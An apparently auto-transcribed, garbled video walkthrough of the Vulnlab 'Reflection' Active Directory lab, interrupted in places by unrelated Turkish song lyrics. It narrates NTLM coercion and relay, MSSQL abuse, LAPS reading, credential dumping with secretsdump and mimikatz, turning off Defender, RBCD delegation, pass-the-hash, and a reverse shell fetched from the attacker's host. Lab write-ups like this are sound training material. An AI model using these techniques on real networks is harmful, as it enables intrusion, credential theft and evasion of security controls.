So what's gonna YouTube, this is man. Today we're gonna be looking for another Active Directory change from Vulnlab. So we call it here reflection. It's working on Windows machine and it's medium difficulty from XCT and Robot. So I love change actually because they actually gave us three or more IP addresses over here, so we need to be hacked. So is it someone here for mail, someone for DC01? So first of all, we need to be understand which one is here equal here DC01, and which one is equal here another one is over here. So if you're checking here 8080 port, working on the Kerberos, and we saw there's running on LD app, and we got it here or there the domain name. So the same things will be giving us here from on the DC01 to it's look like here DC it's like a domain controller. So I already started here another mmap scan. So we saw here there's a really cool port is open, which one is equal here MSSQL. I think it's gonna be really cool, but another important thing we got it here MS01. This is actually equal here, so we can try to be copy it's us also, and let's check it here. Then we'll learn right now this is equal here MS01. So let's doing same port scan for the 7, and let's check it out of here. So after that, all you may wanna get from to on your etc host file, but first of all let's start and then what we can get here on the authentication. So I think we can try to be learning here if there's a working to be SMB on the MSF01. So we are just now here this is equal here MS01 and this one is equal here DC01, and so let's starting with here with MS01. Okay, so what we can do for this, we can try to be so let me go my chains. No, okay, so Vulnlab chains and reflection. Great. So let's checking for their SMB first of all, and maybe some here actually shares we can list it. So let's checking for it. So let's look like a different things here. This is equal here staging. So we can try to be go here staging is over here. So let's try to go staging and then deleting this --l and give it here /. So we are possible to be exactly access it here. And we saw there's staging database configuration. So let's get it like that. Okay, so I can do here exit and cat staging database and the config. So we saw here there's the user working on web staging and the password is washroom is a 510, right? So let's try to be save it before. Then I think we can go for another mmap scan results, and we saw here working on WS01 reflection.vulnlab. So it will be go here. The first of all we are trying to be enumerate here on to MC01. They actually giving us here username and the password. So I think it will be important for to get here on for example access on MSSQL, for example, right? So we can try to be do this and then checking for if there's any local authentication, then use it for MSSQL. So let's checking for the same things because we are working on this SMB. So with crackmap we can try authenticate on SMB to verify these are valid credential. So let's start here with crackmap actually. So we can call crackmap SMB. So you may wanna know to be gave here all IP addresses. So which one will be actually correct for you. So you can do it with this dash, and let's give you here the last subnet and give you here dash view, and then we can now give here our credential, and let's checking for is there any working on IP addresses. and which one is actually accepted for login page, or the which protocol we can actually use this. So after that we may want to know and the we got it here, it's not working on the VS01, not working on DC01, and we know just right now it's just working on MS01. So we have no access to here on this SMB, and this SMB to be accessed is with this credential. So it means we can look like the correct way. So right now we can try to authenticate it over MSSQL. The service is running on DC01, and you will be see here there is no DC01, not DC01 and MSSQL, but we got already here MSSQL is over here. So how we can check it is actually it's not important to working or not working. So we are just giving here on the same command with crack map exec, and then you might can do here MSSQL directly. So if there is a not hit back you any other commands as an successfully login, for example on DC01 or MS01, so it could be maybe there is a not working. So we saw here is login failed on DC01 MS01, and we saw there is no any MSSQL port is open. So what we can do right now, so there is some command you can use for this one, because as you know is MSSQL working on --local authentication. So it's because they are working on the locale. So you may wanna know to giving this command here right now. So am I gonna do something wrong? So I have to be added here / for sure. So let's check it out. So maybe we can access here some MS01 to before maybe it okay. So as you can see here, after we gave it here local authentication, it's safe for us here. Yes, it's working on to be a reflection on MC01. So we are working here right now on this Microsoft Services 01, and this credential is actually working. So what you can do right now, you may wanna work it here with MSSQL client.python. So it hits you back here in packet. So let me check it. It's my own MSSQL client. Yes, it's over here, and we can do here giving our credential directly. So where is it? It's over here. So let's just copy this directly. So let's add this on password. Then give this. And then you may wanna give it here MS01 IP addresses. So after you checking all them, so you will be see here you are on this Microsoft service on this SQL services over here. So for the pen testing on over here, you can check it for hack tricks for 1433 pen testing on the Google. Oh my god. Okay, so let's check it for. Okay, so I really recommend it here from to be you can doing your pen testing on MSSQL. I mean, so it's a Microsoft SQL server. It's over here. So this is for the starting here, but we are already get it here. You know, so we can do here common enumeration or get user, get permissions, or you can try some tricks, or steal net NTLM hash, or really attack. So let's check it for the same thing for where was it? So let's start here with common enumeration. So for example, it says if you give this is over here, it need to hit you back as an version. So it says our copyright from C Microsoft Corporation and 2022 on the hypervisor they are for example using here. So but I think is most important commands on the MSSQL is definitely XP shell. So after you actually checking for XP CMD shell and who am I, so it says our here XP CMD shell is to be not executed permission. So we have no permission to be run, right? So to be gathered here, I think important things the another things here if you have no permission for xpcmd shell, I generally using your xp directory. So for example, let's checking for xp directory, let's looking for C, and we got here nothing, as you can see. It's look like we have no access on this local authentication for the C directory. So that will be correct, but there's another thing. So if you're checking here NTLM, so let's check it. So definitely I took about it and still net NTLM hash and really attack. So you should be start SMB server to capture the hash usage authentication. So you can use it here in packet SMB server or responder. Generally using here the responder for sure, and we want to be run again with the responder. And then let's check it for on your servers, and we are working on HTTP. And then okay, so when it's actually SMB is open, you way available to be sending here NTLM hash attack. So need to be go back and what it says. So it's actually already says here. If you want to be do here stealing to be NTLM relay, so you may wanna use it this. So you just have to be changed with your attacker IP. Definitely, I'm gonna be giving here my IP addresses. Okay, so let's start with this. So that could be definitely is anything. So you can give it here anything here. So let me, for example, give my name. Doesn't matter, right? We can try to be send it right now, and let's see, maybe we can get some back on my responder. It's over here. So let's try. So we send it right now, and then as you can see here, we are getting the hash from services web staging. So for example, if you're asking here, is it crackable or not crackable? It's not important, but as a for sure we can try something different before to be cracked it. So for example, what kind of things we can try? So there's another user here, services web staging, and then chains and reflection. Let me go and nano hash. Okay, let's give this cat and hash. Great. So let's try to be cracked it. Shion hash wordless. So it could be took a minute. Maybe it's not crackable. Have no idea right now. We will see. But it's doesn't meaning it's everything is done right now. If it's not crackable, it's not meaning we are at the wrong way. So the you will be see here on that this hash is not crackable. So we can crack this hash, but maybe we can relay as SMB signing to be disabled. Definitely we can do this with NTLMrelayx. So we can really hash and authenticate and then getting something different here, and working on the NTLMrelayx is over here definitely. So first of all, how we can understand it is right now. The for understanding it, you can use again crack map exec. So we are working on SMB and on this IP addresses, the 5 to 7, and then you can try here --gen relay list. So if they have the relay list here, we can do authenticate actually. Let's do. Okay, so as you can see here, there's yes, we are available to be getting here NTLMrelayx. So it's important things where you can find NTLMrelayx. It could be here. I think I have NTLMrelayx. So is it on the in packet? Let's see. In packet NTLMrelayx. That's right. So we can use NTLMrelayx right now, and then you just need to be giving here --help, and let's see. So there's really too many things you can use for NTLM risk. So to be starting here, you can give it here targets file. So the file that contains targets by hostname or full URL, one per line, and to be giving your on your host.txt, for example, or giving the to IP addresses directly. So what we are trying to be do, and then as we do before here, you can check it again. So let me show you. and we are starting here on SMB and gen relay list, and it's hits me back, it's correct. So I'm gonna be doing here nano and host.txt. So we are already getting our host is over here, right? So let's try to be give them on my host file. So let's try to be deleting before this one, and then this one. All right. Nope. Nano. Okay. So just wanna. Yes. I have no idea what's wrong right now, but I don't think so. I got it with correctly. Okay, great. It's really great. So we can try right now in packets. Okay, NTLMrelayx and -tf for host.txt, and then we're gonna be support on the SMB2 for sure. Okay, let's see. Something wrong. Maybe we NTLM relay x Python file could be. So it could be somewhere NTLM relayx. I actually use it. Let's see. Because locate. I was using it. I don't think so it's here, but let's try. -tf and hosts.txt -smb to support. Let's need to hit back the same things. It's already in use. Okay, so that's why I am working on yeah. It's because I was using here responder. So on the service started right now. So as you can see, the service is already started. So for example, if you're doing something here on this over here, and the same things, for example, so it's back here. So we can checking for NTLMrelayx the same things. So let's checking for authentications agent. So it's working on this SMB. So it's not our target IP addresses, but we show here is a reflection services web staging is failed. So if it's failed here, it means we are at the wrong way. So there is something like an AV or EDR, and it's just fucking up here, right? So what we can do, we can use here same things, but just working for to be get here the version number on this MSSQL, for example. Let's see, for example, doing in packets NTLMrelayx one more time, but we may want to know where we are actually working here, to which IP addresses we actually got it here. So which one we got it here? This IP addresses, right? So let's equal here on the MS01, and then we need to be using here this IP addresses for it. The first of all, okay. So what we can do, -t MSSQL, and then give this or to be or target IP addresses SMB2 support, and then -- query. So I'm gonna be giving here query is a really basic query. So I just wanna be show you is it really working. Let's try to be go here pen testing here, and then common enumeration, for example the select version here, right? So let's give here select at version. Okay, let's see. So this service is starting right now. It's over here. Then as you can see, then after you give it here the same commands, then you will be see here it's need to be hit back here. Let's see. I have no idea why is not executing SQL. Maybe need to be user here. Why? Not sure. Let's see. Setting up prov server is okay, but we cannot hit back anything on NTLMrelayx. So could be working here, same thing as like here maybe. Let's see. Okay. It's again we need to be get back here, but we cannot executing here an SQL, right? All right. Let's see. So I just want to be get here back on the SMB. I think it could be awesome. Let's see. Maybe need to be wait. Maybe no need to be wait. So we're just sure. Okay. Maybe need to be change it for this. For example, let's try for another ports here, maybe. Right. So it's not equal this permission. It means we cannot add here anything, I think. So I want to be try here again. Okay, let's see. In package NTLMrelayx. So it could be different command here could be injectable dash no. We are not working on HTTP server. Maybe it's back here for wrong one. SMB to support and then dash t. Okay, let's give it here host.txt. I don't think so. It will be needed here, but I may wanna be try here this one and this one, right? Okay, dash c. For example, curl. I wanna be do on my HTTP server here. Okay, right. So let's give this. Right. So let's running this is over here master. Okay, xp right that 3. Okay, let's give my like an SMB 10.8.2.102. And what I actually give here, it was so let's give here nothing, but we may want to be give here on the test. Let's see. Okay. So if I'm gonna be doing here for the 6th one, what's gonna be say? Okay, let's do. Great. So attacking targeted received connection from it, but we are not get back here again authentication. So there is look like nothing wrong we are doing right now. I wanna be try here again in packet. Now HTTP server and give it here let's starting with it and then dash I. Right, let's do. Okay, there is look like is a no target. So it's look like I gotta hear something wrong. It's why is not actually working. So but it's definitely we are trying here something different as we tried before with changing here IP addresses, for example, right? Then we can available to be ready here somewhere. For example, like maybe we need to be do here like on a sock or something like that. So let's do here NTLM. Okay, so we're working on in packet, right? All right. Okay. Let's see. Now here. Okay. But we have a no access here actually. So what we can do here? Maybe we can try like different commands will be hit back us here. I don't know. This one will spoke to me, you know. Right. I will be checking here something. Let's see. Failed. Okay. So packet MSSQL. Okay. Let's see. Doing here really basic things like that. Okay, could be like let's see. Yeah. By the way, can we use it here on this everything on this SQL maybe? So for example, we can do here select and then add version like that, and it hits back here. Okay, so let's do like select name from database or something like that. So for example, if it's gonna be Worky here. So and then after that, all we saw here the master, temp database, model, MSDB, and staging, right? Maybe we can do here something different and then get back shell here as with these passwords. I don't know. Let's see. Let's do this first. Use master. Okay. Then I select from master information schema databases as like that. Okay, so it's select from, it's over here. Let's see. So we need to be giving here database name, and we saw here there's a database, for example, the staging as need to be give this and a dot, and not actually here. Okay, let's see. Okay, and it says our table schema on DBO and users. So we can try to be read it here. Exec the list linked server. So we need to be exec here, right? Okay, exec and sp and linked server. So this is equal here users. So we need to be give here sp users after the exec. So let's give this. Is a for sure need to be added here to be column. So let's see. There is no. How? table name is users is over here. It's for this linked service. Okay, we cannot do select from system services, or same for the system to be users here maybe. But yeah, it's need to be here the same thing here for like the SMB thing. So let's look like now we have a now look like an access, and then it will be says are here to be access is needed, right? But I may want to be do here something like same thing for different IP addresses here. Okay, let's actually do this NTLMrelayx for DC01. Okay, I may want to be change it like that. So then we can try here sending something. Alright, okay, it's working right now. So we got a shell wrong here, so it's because we need to be doing same thing for NTLMrelayx on this DC01. Alright, so I got it right now. After you give it here on this DC01, and it's back here the which actually command you actually choose it here. So I think we can do right now everything we may want to be do. I think it's not correct way to be do it, but yes, I want to be do this. It's because I want to be do here. I'm sure it's working. So what we actually try here is in packet NTLMrelayx on this DC01, right? So it's look like this one is correct one here. So if it's look like a correct one here, so we can try to be added here, and then just need to be remove it. Great. Then select here the version. So let's change it with this select name from master debug databases. So if it's gonna be work, so it means we are at the correct way here, right? So do this, and then yes, it's working. So and then it's because we hit back here as executing SQL correctly. That's great. So but listing in tables didn't work in this user doesn't have an access. So trying to enable CMD shell will not working here. So yeah, it's not working and it will not working. So there was nothing we could from here, but that as we saw previously that services the web staging here the hits back and hash for this it can be authenticate SMB. We can list shares and try to be accessed from the bit for DC01. So for this we need to be use SOX proxy. For example, my SOX proxy is over here, the cats etc proxy chains forgot config. So I'm working on SOX 5 on my localhost on this 1082 port is over here. So yeah, you want to be do this actually, and then you can use it for the for your SOX. Then you can actually use it here and for the same thing, but for this we need to be use a SOX proxy. It's going to keep SMB connection and also list a relays which were successful. Let's do this in packet, right? Okay, NTLMrelayx -tf. Okay, so let's give it here all hosts here, then SMB to support and dash SOX. That's why I want to be using here the SOX. So if you try here the SOX and then don't know relays is available here, and you will be see here. So let's do this again one more time. And where's mines? I'm not sure why it's not working. So we may wanna now here. Okay. So the connection from reflection services web staging controller attacking target is SMB. It look like actually working here right now. Okay, so it does show this user not admin, but still we can access his SMB. Okay, so we can use it here SMB client actually directly. So let me try actually first. Is it gonna be working? Proxy change SMB client dash view will be capital U, is will be okay. Reflection you can wanna be given here, and the services web and staging because we are working on this services web staging. So for example, let's try to be listening here on DC01 and dash L. So it's hit me back here as a password, but yes, we have no password for the user. Let's check it for connection from reflection services web staging control, but there are more targets left. I think we get okay. So after checking here the socks, and you will be see here this one and this one, it's look like working here right now. Let's see. Okay. So we can hit back here again. Socks need to be work. Okay. Right. So we can try give it here for same thing here right now, but it's not hit as a back here for DC01. Okay, let's listening for the 47. Okay, so it's actually hits me back is for here is nothing. Then yes. But this hash's password is not crackable. So what we actually can do here, it's because I asked you. Maybe we can try to be in packet here on the no HTTP server. Then we can use it here ncat listener. Can we use it right now? Let's try on the on or local host ncat. It's not connection refused for sure. Okay. Proxy change no. Okay. Socks is not have this, but we have an access for them. Not sure what's wrong. Okay, but we can try another things here, like so maybe it will not gonna be working, but let's see. In packets NTLMrelayx again, and then as you remember before, I was used here and no HTTP server on SMB-tor and -i. Right. Okay, let's give this again. Now what's gonna be say so it's not working for loss. Okay, not gonna be judge it, but in cat. Okay, so it's in cat right now working. So it's work, but it's need to be also work. I'm not sure why it's not work. Maybe someone fucked this up, this machine, before leaving. So we hit back here as shell. Okay, that's really great. And what we can do, checking for it hits you back as to be SMB map. So I want to be using here prot. Okay. We can do his ls and get prot and database.config. Let's see. can be back, cat broad database and config. So we already got it here. That's great. So we can use this credential maybe for some reason, all right? But it's definitely before do this, we may manual checking for if it's working on this correct one, what it's actually working. So let's check it for here. I think it will be okay. So now it's back here, so we can close it. Let's use this here crack map exec again with local authentication, but don't need to be give you all IP addresses here. We are gonna be try here with this credential to web prod and give this also. Let's see if it's working somewhere. And then we already see here, yes, it's working on DC01. So and right now we will availability read here on this DC01. So we hit back on this DC01. So let's go for DC01. It's over here. So we got here our new targets and it's equal here DC01. We can do here or MSSQL client, that's Python for the same things on DC01 right now. Okay, so I'm gonna be using here same thing with MSS client, but you need to be changing with DC01 IP addresses, and for sure this password or password is equal that, and then our username is not web staging, it's right now it's web prod, right? So yeah, we are successful login here. Let's see. We can do here right now select version, and it's worked successfully. You will check in here somewhere we got here some databases. So it's, for example, hits back here use prod. So we can use it here use prod directly. And let's say to changing database connects to prod, and we can do it right now is everything as same with MySQL, select all from users, and then we hit back here to username and password, and it's over here AB Smith and this password, and this is Dorothy Rose password is over here right now. Yeah, this is really cool, and we hit back here the username and password for 2 users. Yeah, this is okay right now. Let's see, can we get here any users.txt before? Nope, right? We can try nano users.txt. The first one is equal here AB Smith, and second one is equal here Dorothy Rose. Okay, cat users.txt. Nano passwords .txt, and give this password. Great. And this password also, let's give, and we can run it here crack map exec right now. Just need to be giving here all IP addresses. For the username you can check it here users.txt. For the password you can check it here password.txt, but we want to be continue it on success. So and we saw here then AB Smith's credential is working for just DC01 just for, and okay, so is this is actually working for DC01. This one is working for VS01, and this one is working VS01. This one is working for MS01, and this one. Okay, this password is work for all SMB for all credential here, definitely, right? So let's try to be executed it. So this is gonna be equal or dc01, right? So it's time to be getting here add on etc host file, I think, right here. Okay, dc01 dot reflection dot vulnlab and the reflection dot vulnlab. Okay. So I think we can right now using here BloodHound because we are already getting get or credential is over here. Then we may wanna continue is over here. Get some JSON file analyzing on BloodHound and hits back for another one here, right? Yeah, maybe we are gonna be working as the same things for us here. Okay, that's great. Let's see. Gonna be classes also, and we'll be storing here sudo neo4j console make there here blood cd blood and BloodHound dash python dash d. I'm gonna be giving here my domain name. Okay, my domain name is equal here reflection.vulnlab. And then dash u. Let's start it with here AB Smith, okay. And then dash p will be equal here the password. We saw here this is gonna be using for the password here. Great. And then dash ns. You may wanna give it here IP addresses. Doesn't matter. And then dash c all. Everything I wanna be getting here actually. So it's font domain reflection.vulnlab and getting TGT for users. Not sure why it's not working here right now correctly. Okay, let's see. Maybe need to be do same thing for another user here, right? Could be. Why not? Okay. Let's go for this user dash u directory rows, right? With this password. Okay. Maybe I added my host file wrong here. Nope. Oh, yes. Alright. Let's see. Okay. I was got it wrong here. Alright. It's working right now. Uçlarımda istediğim sayı var uçlarımda dedesi gibiyim seni adı pabuçlarımda yapmak istiyorum seni suçlarımdan biri avuçlarımda istediğim gibi parmak uçlarımda dedesi gibiyim hala pabuçlarımda yapmak istiyorum seni suçlarımdan biri Suçlarımdan beri. Suçlarımdan beri. Alright, so last, and we gotta hear too many things, and we can do here BloodHound directly. And I want to be clear my database first. Upload the data. Vulnlab, chains, reflection, blood, get all JSON here. Alright. Uçlarımda yüzesir gibiyim, hala yolu pabuçlarımda, yapmak istiyorum bu gece seni suçlarımdan beri. So we already got it here or use us the, for example, let's looking for ABC mid, mark user as owned, and then looking for some more info first. And we saw this is a member of domain user and is he may have permission? Okay, alright, we've fun. So it has a generic all for MS01 reflection.vulnlab, and then after you see is over here, it's available to be added here new computer and use it here PyWhishker or something like that, but it's not needed for all. So it's, however, it's since we have it here generic all, so we can read it here labs on this MS01. Let's try to be ready here labs on MC01 actually. Alright, so crack not exact I will be used again, but for user, and let's use for AB Smith and -p, give this password, and let's see --labs, what it's gonna be says us here. Alright, so it's punit on DC01, but let's check it for if it's will be puning on MS01 as also. Let's see. Alright, so it's already punit on MS01, so we can read here same thing for MS01, and then you will be see here, and it's gave us here administrator hash is like that. So yeah, which one is cool, I think. There was not needed to be analyzing everything on BloodHound, maybe it will be needed for everything, but we are already getting here as administrator right now, and then we can use it for as MS01 right now directly. So evil -windows rm -i, so I have to be giving here MS01 IP addresses right now, -u, my user is equal here administrator, and then -p, let's give this password. Right. I hope I get it correct. Now let's see if it's working on. Yes. So we are successfully getting here documents. Let me just checking for desktop. If there's some flag. Yeah, okay, so we already got it here, the flag right now. That's really cool. I think we can do right now same thing for everything. To, for example, after checking here who am I, so definitely you will be see here your administrator, but on MS01. So we can try to be get it here in packet secret stump, maybe get some NTLM hash or something like that, right? Not sure gonna be work, but yeah, let's see. You know, we can do here same thing with Mimikatz or the everything different. But I just wanna be do first same thing. Okay, so let's say this for BloodHound. Let's checking for same thing for okay, so ls is over here in packet secret stump. Okay, if it's not gonna be working, I'm gonna be using here mimikatz for sure. But let's do this first. Yeah, in packet secret stump. Okay, ms01. We are actually working on administrator. Let's give this password. Okay, and then add. You may want to give here hash IP addresses for ms01. Okay, right now. Let's give this. Okay, great. So we can hit back here administrator hash. Etmemiştim. Kafamda görüntü hep çelişki. Koldum işte. Dönüştüm. Alışmamıştım ki. İşte. So there's a Georgia price, but we have no password for Georgia price right now. So it's look like we need to be uploaded here mimikatz. So let's see. Akınca kankanlar avuçlarımda, yarılırken izlediğim parmak uçlarımda, yetenekli gibiyim hala olup pabuçlarımda. Okay, let's upload it here. ncat64 exe cp opt mimikatz x64 mimikatz exe here also. Then upload them and try to be gather here hash for administrator. Then we'll try to be use it. I will do it. Okay. So we got here too many. For example, we found here services verb staging password, but no look like more username here or information. So let's check it for first. Senin şehri pabuçlarımda, yıkızı gibiyim hala davul pabuçlarımda, yapmak istiyorum bu gece seni suçlarımdan beri. I can see here anything important for DC01, so it's back here ms01 hashes. Okay, I think I got it here. I will be uploading here mimikatz exe. First, let's upload ncat64 exe here. Okay. Then upload mimikatz exe, then running here mimikatz exe directly will be more cool. Okay, do first type desktop flag.txt, because maybe I will be lost this shell. Wanna be save it. Okay, let's do. That's really great. Call here dear. Okay, so we can upload it here ncat64 exe, and I don't know why. There is no ncat64 exe. Yes, we need to be uploaded here actually. Okay, so my commands will be maybe work here. Preference and disable real time monitoring will be equal here true. Okay, let's see. who am I? Less del ncat 64 exe, then upload it one more time. Let's see. Okay, after ls. Okay, so we are successfully uploaded here, then uploaded here mimikatz.exe. Alright, so it will be uploading. Okay, started here in ncat listener. There. We need to be running here ncat64 exe. Give your port and which actually port you're listening -e cmd.exe. Right, so we get shell back as over here right now. After checking here, dear, it's need to be work. Let's see. Maybe we are listening here correct port, not correct port, or could be, huh? So 443. Let's try on this. Okay. Maybe 443 we're gonna be work. So dear, okay, let's see. Dear again, look like not work. So it's just hit back here. Okay. Set MP preference, maybe. I don't think so it's gonna be work again, but we can actually bypassing here some EDR and something different actually. Can we try here cd opt prolapse? Okay, Zephyr cat probably PowerShell 1. Okay, I was using here some PowerShell and it was work. Locate Osman dot PowerShell 1. Great. So I cut it myself this. I want to be try if it's gonna be working. Opt Vulnlab chains reflection cp here. Let's see, upload Osman.PowerShell 1, and yes, cat Osman PowerShell 1. But we, yeah, for sure we need to be change it, right? Sublime Osman PowerShell 1. I will be give my Dana a.2.2. Let's see. After del, let's run this one more time. On this ncat. Does it bypass? Yes. I can bypass it right now correctly. So let's use it here, mimikatz.exe maybe. But it's not gonna be work on this PowerShell mimikatz.exe, right? Yeah, I can bypassing EDR here, but I'm not sure how I can actually do here. It's working this. So yeah. Need to be change my eventually here. Not sure, maybe gonna be work here. Different things. Okay. Nope. But can we use it here mimikatz PowerShell 1? Mimikatz PowerShell 1 file. Okay. CP home elite downloads mimikatz CP let's try to upload it. Okay, and the first I will do my same command, set mp preference dash disable real time monitoring true. Great. So let's see where's there. Okay, upload here right now. Invoke mimikatz. So we can do here for not get nothing here. Nothing wrong here with IXIWR. Do my IP addresses first, and then which actually file you want to do, and use this dash use basic per sync. Let's see. Is it here? So after that, invoke mimikatz need to be work like dash which command you gave here. We'll give it here directly token elevate and then I'm just looking for here Vault Credential the patch. Okay, let's see. Yeah, it's not work. Nope. What I'm actually do this upload invoke mimikatz PowerShell 1, then try to be running directly maybe. Okay, here. Okay, we can run it, but first let's run my command cat, then run it here s1 PowerShell 1. So after you give it here dir, let's see, can we run this? Nope. Right. Directly this maybe? No. PowerShell -ep bypass with this. Alright, so we are not successfully bypassing here this EDR, and I don't know why. It needs to be easy to do it. Let's see. So let's checking for maybe there's like RDP. Where's my notes? DC01 has actually here RDP. Can we use here x3 RDP -f -u administrator for password. Where's my admin password? It's over here. Okay, let's give this and then insert. Definitely ignore the X. Yeah. We need to be give or house. Let's see. Okay. Okay, so we can available do this, but I'm not sure you can solve it. So let's change this. Yeah, for example, I'm really not sure you can see this, so I may wanna try to be used here different things like so. Can we use it here sliver maybe? Right, cp opt sliver. I think it's not needed here. Okay, let's exit here. Then use here different things. So like on sliver, we can try to be use so I imagine it's back here to be password for Georgia. Georgia dot price, and it will be equal here dbl plus dash mp copy sg 5 id, right? Okay, crack map exec again. I want to be used, right? Okay, let's see. Let's try this password with this user. Georgia.price from 5 to 7. Okay, let's see. So yeah, only if password is equal this for VC01 and DC01 here, but I'm gonna be bypassing the EDR at the last part. Okay, like I'm not gonna lie. So let's checking for again here with our new username is equal here Georgia. Give this mark user own it and first degree, and then you will be see here it has a generic old for VC01 directly, and it can be allowed to be behave all the computer. You will see here, and we can try to be using here again in packet secret stamp for get here some hash for the user. Okay, that's great. Let's do first in packet secret stamp, but I'm gonna be using like here administrator, and which one has here VC01. So I'm gonna be put here VC01 hash, this one will equal, and for the password gonna give here where is it, the password for Georgia. Okay, this password need to be work. Let's see, login failure. So 46. Not work. Okay, let's try to give this real administrator password here, and so we did it before. Let's see. Yes, it is here. So is it needed to be do it again? I don't think so. It's because I want to be getting here reflection MS01 here right now. Yes, this could be important here to be editing MSDS allow it to act behave on identify with RBCD Python file. All right. Okay, let's use this hash for RPCD in packet RPCD and dash action right here dash delegate to VC01 $ here dash delegate dash from MS01 $ again dash DC dash IP. So you may want to be giving here to IP for VC01 right here. Okay, let's see, and then Georgia Price with his password. Can we hit pinky here actually? Is there something wrong? No, we can send a ping. Okay, so it's not definitely equal here, so it has to be equal DC01 IP addresses. Yes. So, and as you can see here, it's working successfully. Then I think after that we can add it here. So it's because we got here NTLM hash for it. Then directly we're gonna be work for administrator cage in packet again get st, where was it? It's over here, dash cpn, and let's give http vc 01 dot reflection dot vulnlab dash impersonate here for administrator dash dc dash ip again dc01 dot reflection dot vulnlab, and then again here we need to be add reflection dot vulnlab for ms01 $sign dash hashes. So we already got here hash. It's this one. It's actually then another things is equal here to this one. So we need to be copy this and save this over here. And then let's see where it's wrong. No, etc on host. Maybe add this. vc01 dot reflection dot vulnlab. Okay. Oh my god, I don't know what's my wonky here, bro. So we gave our SPN here, so it doesn't matter HTTP or anything. vc01 reflection dot vulnlab. Okay, let's give this like that, for example. I don't know what's different, but impersonate will be administrator dash dc dash ip dc01 reflection dot vulnlab. After that reflection dot vulnlab. So let's give this like that, for example. It's not important too much. Then gave hash. Let's see. Let's give it like that, for example. Alright, so saving tickets in administrator HTTP vc01 as the catches over here. Alright, so we got our cage successfully, and we can do here export. I generally do this actually, and then just need to be giving here opt vulnlab chains reflection. Give this. Okay, so I think it's not gonna be work. Let's checking for keyless, and it says yeah, it's working with administrator here. So we can do right now directly again secret stump again in packet secret stump for vc01 administrator at vc01 dot reflection dot vulnlab dash key. We have no password because we are already added as to be cage here. Reflection dot vulnlab dash key dash no dash pass. Policy SPN target not exact for this. Keyless again. So it's work. I mean, it's wrong. So we can finally gain code execution for this. I don't know. So let's try in packet. Add exec dash key dash no dash pass. Administrator at vc01 dot reflection dot vulnlab. For example, who am I? I don't know why it's not working right now. In packet let's give here IP addresses. It's not allowed. I don't know why it's not working. Okay. Let's do this directly in packet secret stamp dash key for WS01 dot reflection dot vulnlab. Let's check it for okay, I want to check here keyless again. Okay, not font. Okay, export keyless packet. Let's see. Okay, wanna ask it to ChatGPT? ChatGPT. Let's go. Maybe I'm doing something wrong. You know, what should my packet secrets dump command? Let's see. Alright, so does it look like just something working? But no more. What it says. Pew, pew, pew. Let's see. What should I do? Oh, we have no SAM or other one. Keyless. So on the first thing we was getting here, Memo administrator, keyless. Okay. In packet get st. Okay. Reset keyless. Yeah, it's need to be like that, kind of. Keyless. What about this one? He's saying something wrong. Okay. Let's see. Yeah, I think we can do something different here, like to be get hashes here. So it's because they need to be hit back as hashes, like for login here administrator. So I can do here right now. It's because I remember this one is equal here a2. Okay, so okay, let me give a29543c b2 707 bf 66 c1 d2 c okay, let's see if it's work here. I mean, successfully. Crack map exec then dash hash. Okay, give this for administrator. A29542 2CB 2707 BF6 D6C 1D2C. Okay. Let's see. Let's try this with on ps exec. Okay, ps exec on in packets, ps exec administrator at vc01.reflection.vulnlab and dash hashes. Okay, let's give this. Okay. Let's try. So yeah, it's working here. No pressure. But I wonder it's gonna be hit back as a shell. Yeah. It's not important if it's not hit back a shell as here. It's because we can try here in packet and 80 exec and hashes. Give the hashes here directly, okay? And then you will be see here what I am trying to be do right now. VC01 administrator and at VC01.reflection.vulnlab. Let's see, can we run it here PowerShell.exe-c. We need to be giving here commands, for example, who am I? Let's see. In packet 80 exec, right. Alright, so yeah, it's working here successfully. We can try to be ready here flag or different things, but I want to be get here shell. For the get shell here, we can try first, like, let's see. We just need to be changing here because it's working successfully. So let's change it with here my command p preference dash disable real time monitoring will be equal here true. Okay, let's do this. Okay, I think it's work. So then after that we can try for the same command here set mp preference here dash x collision paths. We need to be give x collision path c. Let's download on, okay, so we can download on the c, I think, because we are just x collision it. Then upload here PowerShell file, okay, right here. Okay, so let's run it here Python listener. Then let's upload here the reverse shell. PowerShell exe. If you wanna be give here, you need to be now dash nope and dash v save as hidden dash ep, and let's bypass it dash c. Right now we can give our commands. We are working on to ix, and let's give a new object net web client download string need to be give here http, give my IP addresses and which PowerShell you want to be upload. Let's see. Okay, let's try. Where's the typo? Let's see. All right. So yeah, we can get back shell here successfully. So after checking here who am I, and you will be see here your anti-authority system. So we get back shell here directly. I think it's over here. That's really cool. Great. So we are at our shell right now, and what we can actually do, let's checking for pwd cdc here users here cd administrator here, go for desktop here, nothing here, here. Can we go this man's desktop actually here, go for desktop here. So yeah, we got it here flag, type flag.txt. Okay, we own here another flag successfully. Yeah, so we need to be maybe can try read here some typo or something like that. I think it was awesome to be do it, and thank you for watching this video. I think it's done right now because we are accessing all administrator cache here. Thank you for watching.